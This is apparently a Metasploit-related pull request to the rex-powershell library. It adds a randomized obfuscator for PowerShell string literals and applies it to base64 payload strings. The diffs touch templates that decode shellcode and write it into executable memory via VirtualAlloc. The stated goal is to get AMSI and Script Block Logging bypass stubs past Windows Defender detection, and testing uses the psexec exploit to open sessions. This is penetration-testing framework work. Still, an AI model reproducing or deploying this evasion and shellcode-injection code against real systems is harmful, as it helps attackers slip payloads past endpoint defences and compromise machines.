### PR TITLE
Add and use a method to obfuscate string literals

### DIFF
--- a/data/templates/to_mem_pshreflection.ps1.template
+++ b/data/templates/to_mem_pshreflection.ps1.template
@@ -1,7 +1,7 @@
 function %{func_get_proc_address} {
-	Param ($%{var_module}, $%{var_procedure})		
+	Param ($%{var_module}, $%{var_procedure})
 	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
-	
+
 	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
 }
 
@@ -10,16 +10,16 @@ function %{func_get_delegate_type} {
 		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
 		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
 	)
-	
+
 	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
 	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
 	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	
+
 	return $%{var_type_builder}.CreateType()
 }
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
-		
+
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
 [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
 

--- a/data/templates/to_mem_rc4.ps1.template
+++ b/data/templates/to_mem_rc4.ps1.template
@@ -1,7 +1,7 @@
 function %{func_rc4_decrypt} {
     param([Byte[]]$%{var_rc4buffer})
 
-	$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
+    $%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
 
     $s = New-Object Byte[] 256;
     $k = New-Object Byte[] 256;

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -268,6 +268,8 @@ EOS
   # @param opts [Hash] The options to generate the command
   # @option opts [Boolean] :persist Loop the payload to cause
   #   re-execution if the shellcode finishes
+  # @option opts [String] :prepend A stub of Powershell code to prepend to the
+  #   inner payload.
   # @option opts [Boolean] :prepend_protections_bypass Prepend a stub that
   #   bypasses Powershell protections.
   # @option opts [Integer] :prepend_sleep Sleep for the specified time
@@ -370,8 +372,8 @@ EOS
     end
 
     command_args = {
-        noprofile: true,
-        windowstyle: 'hidden'
+      noprofile: true,
+      windowstyle: 'hidden'
     }.merge(opts)
 
     if opts[:encode_final_payload]

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -336,16 +336,6 @@ EOS
     end
 
     compressed_payload = compress_script(psh_payload, nil, opts)
-
-    if opts[:prepend_protections_bypass]
-      bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
-      compressed_payload = bypass_amsi + ";" + compressed_payload
-    end
-
-    if opts[:prepend]
-      psh_payload = opts[:prepend] << (opts[:prepend].end_with?(';') ? '' : ';') << psh_payload
-    end
-
     encoded_payload = encode_script(psh_payload, opts)
 
     # This branch is probably never taken...
@@ -366,6 +356,15 @@ EOS
         smallest_payload = compressed_payload
         encoded = false
       end
+    end
+
+    if opts[:prepend_protections_bypass]
+      bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
+      smallest_payload = bypass_amsi + ";" + smallest_payload
+    end
+
+    if opts[:prepend]
+      smallest_payload = opts[:prepend] << (opts[:prepend].end_with?(';') ? '' : ';') << smallest_payload
     end
 
     if opts[:exec_in_place]

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -268,6 +268,8 @@ EOS
   # @param opts [Hash] The options to generate the command
   # @option opts [Boolean] :persist Loop the payload to cause
   #   re-execution if the shellcode finishes
+  # @option opts [Boolean] :prepend_protections_bypass Prepend a stub that
+  #   bypasses Powershell protections.
   # @option opts [Integer] :prepend_sleep Sleep for the specified time
   #   before executing the payload
   # @option opts [String] :method The powershell injection technique to
@@ -306,9 +308,15 @@ EOS
       else
         fail RuntimeError, 'No Powershell method specified'
     end
+
     if opts[:exec_rc4]
       psh_payload = Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, psh_payload)
     end
+
+    if opts[:prepend]
+      psh_payload = opts[:prepend] << (opts[:prepend].end_with?(';') ? '' : ';') << psh_payload
+    end
+
     # Run our payload in a while loop
     if opts[:persist]
       fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -269,7 +269,9 @@ EOS
   # @option opts [Boolean] :persist Loop the payload to cause
   #   re-execution if the shellcode finishes
   # @option opts [String] :prepend A stub of Powershell code to prepend to the
-  #   inner payload.
+  #   payload.
+  # @option opts [String] :prepend_inner A stub of Powershell code to prepend to
+  #  the inner payload.
   # @option opts [Boolean] :prepend_protections_bypass Prepend a stub that
   #   bypasses Powershell protections.
   # @option opts [Integer] :prepend_sleep Sleep for the specified time
@@ -315,8 +317,8 @@ EOS
       psh_payload = Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, psh_payload)
     end
 
-    if opts[:prepend]
-      psh_payload = opts[:prepend] << (opts[:prepend].end_with?(';') ? '' : ';') << psh_payload
+    if opts[:prepend_inner]
+      psh_payload = opts[:prepend_inner] << (opts[:prepend_inner].end_with?(';') ? '' : ';') << psh_payload
     end
 
     # Run our payload in a while loop
@@ -338,6 +340,10 @@ EOS
     if opts[:prepend_protections_bypass]
       bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
       compressed_payload = bypass_amsi + ";" + compressed_payload
+    end
+
+    if opts[:prepend]
+      psh_payload = opts[:prepend] << (opts[:prepend].end_with?(';') ? '' : ';') << psh_payload
     end
 
     encoded_payload = encode_script(psh_payload, opts)

--- a/lib/rex/powershell/obfu.rb
+++ b/lib/rex/powershell/obfu.rb
@@ -40,10 +40,10 @@ module Powershell
       format = []
       char_subs = 0.0
       while (char_subs / original.length.to_f) < threshold
-        sub_char, count = char_map.pop
-        new = new.gsub(sub_char, "{#{char_subs.to_i}}")
-        format << "'#{sub_char}'"
-        char_subs += count
+        orig_char, occurrenc_count = char_map.pop
+        new = new.gsub(orig_char, "{#{format.length}}")
+        format << "'#{orig_char}'"
+        char_subs += occurrenc_count
       end
 
       # phase 2

--- a/lib/rex/powershell/obfu.rb
+++ b/lib/rex/powershell/obfu.rb
@@ -25,7 +25,7 @@ module Powershell
     def self.scate_string_literal(string, threshold: 0.15)
       # this hasn't been thoroughly tested for strings that contain alot of punctuation, just simple ones like
       # 'AmsiUtils'
-      raise ArgumentError.new('string may only contain a-z,A-Z0-9,.') if string =~ /[^a-zA-Z0-9\.,]/
+      raise ArgumentError.new('string contains an unsupported character') if string =~ /[^a-zA-Z0-9,+=\.\/]/
       raise ArgumentError.new('threshold must be between 0 and 1') unless threshold.between?(0, 1)
 
       new = original = string

--- a/lib/rex/powershell/output.rb
+++ b/lib/rex/powershell/output.rb
@@ -50,10 +50,11 @@ module Powershell
       # Base64 encode the compressed file contents
       encoded_stream = Rex::Text.encode_base64(compressed_stream)
 
+
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
       psh_expression =  "$s=New-Object System.IO.MemoryStream(,"
-      psh_expression << "[System.Convert]::FromBase64String('#{encoded_stream}'));"
+      psh_expression << "[System.Convert]::FromBase64String(#{Obfu.scate_string_literal(encoded_stream, threshold: 0.01)}));"
       # Read & delete the first two bytes due to incompatibility with MS
       psh_expression << '$s.ReadByte();'
       psh_expression << '$s.ReadByte();'
@@ -109,7 +110,7 @@ module Powershell
       # GzipStream operates on the Memory Stream
       psh_expression << '(New-Object System.IO.MemoryStream(,'
       # MemoryStream consists of base64 encoded compressed data
-      psh_expression << "[System.Convert]::FromBase64String('#{encoded_stream}')))"
+      psh_expression << "[System.Convert]::FromBase64String(#{Obfu.scate_string_literal(encoded_stream, threshold: 0.01)})))"
       # Set the GzipStream to decompress its MemoryStream contents
       psh_expression << ',[System.IO.Compression.CompressionMode]::Decompress)'
       # Read the decoded, decompressed result into scriptblock contents


### PR DESCRIPTION
This adds and uses a method that can obfuscate powershell string literals. In the case of our current protections bypass stub (which is a combination of an AMSI bypass and a Script Block Loggin bypass), it is being detected as a malicious script. These changes alone aren't enough to fix that but put us in a position to add additional entropy to strings that are otherwise contributing to this classification. I also added a generic option to prepend a Powershell stub that can be used in the future to add custom logic. This currently isn't leveraged but will be necessary for future work on the Metasploit side of things.

## Testing
For now, things are still identified as malicious so the target Windows system must have Defender disabled, specifically the Real Time Protections setting.

- [ ] Start msfconsole
- [ ] Run: `use exploit/windows/smb/psexec`
- [ ] Set the target and payload options as appropriate
- [ ] Enable bypasses, run: `set Powershell::prepend_protections_bypass true`
    * The bypasses use the new string obfuscation method, so this demonstrates that the resulting expression is syntatically correct every time.
- [ ] Run the exploit a few times and see that a session is opened each time

## Example

* Previous obfuscated string literal which was static: `'ScriptB'+'lockLogging'`

New obfuscated string literal which changes (default threshold is 0.15).
```
>> Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging')
=> "(('Scrip{2}B'+'loc'+'{'+'0}Log'+'gi{1}g')-f'k','n','t')"
>> Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging')
=> "(('Sc'+'{0}i'+'p{1}B{2}o'+'ckLo'+'gging')-f'r','t','l')"
>> Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging', threshold: 0)
=> "'ScriptBlockLogging'"
>> Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging', threshold: 1)
=> "((''+'{'+'6'+'}'+'{'+'9'+'}'+'{'+'1'+'}'+'{'+'1'+'3'+'}'+'{'+'0'+'}'+'{'+'3'+'}'+'{'+'5'+'}'+'{'+'8'+'}'+'{'+'1'+'1'+'}'+'{'+'9'+'}'+'{'+'7'+'}'+'{'+'2'+'}'+'{'+'1'+'1'+'}'+'{'+'1'+'5'+'}'+'{'+'1'+'5'+'}'+'{'+'1'+'3'+'}'+'{'+'4'+'}'+'{'+'1'+'5'+'}'+'')-f'p','r','L','t','n','B','S','k','l','c','o','i','g')"
>> Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging', threshold: 0.5)
=> "((''+'{0}c{4'+'}'+'i{'+'3}{'+'7}'+'{5'+'}'+'{'+'8'+'}'+'oc'+'{'+'6'+'}{2}'+'ogg'+'i{'+'1'+'}g'+'')-f'S','n','L','p','r','B','k','t','l')"
>> 
```